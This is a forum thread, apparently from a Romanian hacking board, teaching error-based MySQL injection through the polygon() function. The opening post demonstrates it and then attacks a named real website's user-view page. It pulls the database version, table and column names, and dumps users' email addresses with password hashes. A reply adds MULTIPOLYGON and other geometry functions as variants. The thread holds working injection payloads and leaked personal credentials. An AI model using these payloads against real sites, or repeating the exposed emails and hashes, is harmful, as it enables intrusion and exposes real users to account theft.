nacks Posted January 3, 2015 Report Share Posted January 3, 2015 This method based on the function polygon().In a nutshell, this function constructs geometry collection.The vuln thing about it, that it can only work with the function point().For example:SELECT polygon(point(53,12));And the output is a bunch of ???'s.Not really exciting, ah ?For those who know a bit geometry, it goes like point(x,y).Now look whats happend when we dont use point().SELECT polygon(53,12);Error 1367 (22007): Illegal non geometric '53' value found during parsingWe get an error on our x argument, 53.So lets think a bit.If the error returns our string input as an string output, what would happend if we try to run a query ?SELECT polygon((select*from(select*from(select@@version)f)x));Error 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select '5.5.38-35.2' AS `@@version` from dual) `x`)' value found during parsingBoom ! 5.5.38-35.2Now lets try that on a real site.Conditions:mysql_error on.Lets get the version:http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select@@version)f)x))5.1.73-logNice, but can we extract more ?Hell yeah.We will be using this to get tables:http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(table_name) from information_schema.tables where table_schema=database())f)x))blocklist,log_login,pernodmajorwinners,pernodmanagement,pernodmatches,pernodmess?ages,pernodnews,pernodpolls,pernodtopics,pernoduserIm interested in the table pernoduser, lets get columns:http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(column_name) from information_schema.columns where table_name='pernoduser' )f)x))pernodid,nickname,fullname,forumname,password,email,handicap,p_dbl,p_sgl,login,forumnotify,deletedAnd dump the table:http://www.thepernodship.co.uk/users/view.php?id=polygon((select*from(select*from(select group_concat(email,0x3a,password) from pernoduser)f)x))and.rogers@tiscali.co.uk:22fdf94cc29e7aff8ece472ed119c53e,butters65@hotmail.co.u?k:795b087b2ceb3482dc9956eb8f126ea3And we get the data.To overpower the 'cut results', we can just add a condition in the end, " where email>last-email ".Hope you learned something !Sursa: HF + Frostyhacks 2 Quote Link to comment Share on other sites More sharing options...
botulnr2 Posted January 3, 2015 Report Share Posted January 3, 2015 (edited) Criminala metoda )Cred ca mai sunt functii de genu in mysql care parseaza subquery-ul si dupa il pusca in eroare.Pe 5.6.* nu functioneaza , cred ca functioneaza pe versiuni mai mici , cred...Tnks for shareThe same shit cu MULTIPOLYGON((select*from(select*from(select@@version)y)x))MULTILINESTRINGGEOMETRYCOLLECTION Edited January 3, 2015 by botulnr2 Quote Link to comment Share on other sites More sharing options...
